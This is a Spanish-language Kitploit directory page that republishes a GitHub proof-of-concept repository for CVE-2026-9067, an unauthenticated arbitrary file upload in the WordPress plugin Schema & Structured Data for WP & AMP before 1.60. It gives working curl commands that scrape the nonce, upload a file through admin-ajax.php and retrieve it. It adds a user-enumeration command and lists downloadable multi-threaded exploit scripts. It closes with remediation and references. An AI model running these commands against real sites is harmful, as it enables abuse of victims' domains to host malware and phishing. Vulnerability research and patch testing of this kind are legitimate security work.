Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
By-Poloss..-..CVE-2026-9067 — Schema & Structured Data for WP & AMP < 1.60 - Carga Arbitraria de Medios sin Autenticación [POC y Exploit] | Kitploit
Herramientas/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

Schema & Structured Data for WP & AMP < 1.60 - Carga Arbitraria de Medios sin Autenticación [POC y Exploit]

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
3hace 2 mesesAún no revisado

POC & Xploit - Directorio de Pruebas de Concepto

Documentación y exploits para vulnerabilidades encontradas en el entorno de pruebas de seguridad de WordPress.


Lista de Vulnerabilidades

CVE IDPluginSeveridadTipoEstado
CVE-2026-9067Schema & Structured Data for WP & AMPAlta (8.1)Subida de archivos sin restriccionesDocumentado

CVE-2026-9067

Resumen Rápido

Descripción de la Vulnerabilidad

El plugin Schema & Structured Data for WP & AMP anterior a la versión 1.60 no valida las capacidades (capabilities) del usuario en los manejadores AJAX para la subida de archivos ni valida el tipo de archivo subido. Esto permite que un atacante no autenticado pueda subir archivos arbitrarios.

Impacto

  • Alojamiento de contenido: El atacante puede alojar contenido malicioso en el dominio de la víctima
  • Consumo de disco: La subida de archivos arbitrarios puede agotar el espacio en disco
  • Abuso de reputación: Distribución de malware y páginas de phishing desde el dominio de la víctima

Nota importante: El núcleo de WordPress bloquea los archivos ejecutables (.php, .phtml, .html, .svg), por lo que no existe una vía de RCE directa a partir de esta vulnerabilidad.

Archivos

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # Dokumentasi lengkap (file ini)
├── CVE-2026-9067.py       # Python exploit dengan multi-threading
├── CVE-2026-9067.sh       # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh  # Alternative Bash PoC

PoC Rápido

root@kitploit:~
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

Información del Entorno


Comandos de Prueba

Comprobar el Estado del Sitio

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

Comprobar la Versión del Plugin

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

Enumerar Usuarios

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

Remediación

  1. Actualizar el plugin: Actualiza Schema & Structured Data for WP & AMP a la versión 1.60 o posterior
  2. Deshabilitar el plugin: Si la actualización no es posible, desactiva el plugin
  3. Hardening:
    • Establecer la constante DISALLOW_FILE_MODIFICATIONS
    • Deshabilitar la ejecución de PHP en el directorio de uploads mediante .htaccess
    • Implementar reglas de WAF

Referencias

  • NVD CVE-2026-9067
  • Base de datos de vulnerabilidades de WPScan
  • Página del plugin de WordPress
  • Investigador original: 0xBassia
Descargar herramienta
CampoValor
CVE IDCVE-2026-9067
PluginSchema & Structured Data for WP & AMP
Versiones afectadas< 1.60
CWECWE-434 (Subida sin restricciones de archivo con tipo peligroso)
CVSS v3.18.1 (Alta)
Investigador0xBassia
CampoValor
URL objetivohttps://yorbit7.ddev.site
Versión de PHP8.4
Base de datosMariaDB 11.8
Versión de WordPress7.0
Método de pruebabasado en curl (pruebas de caja negra)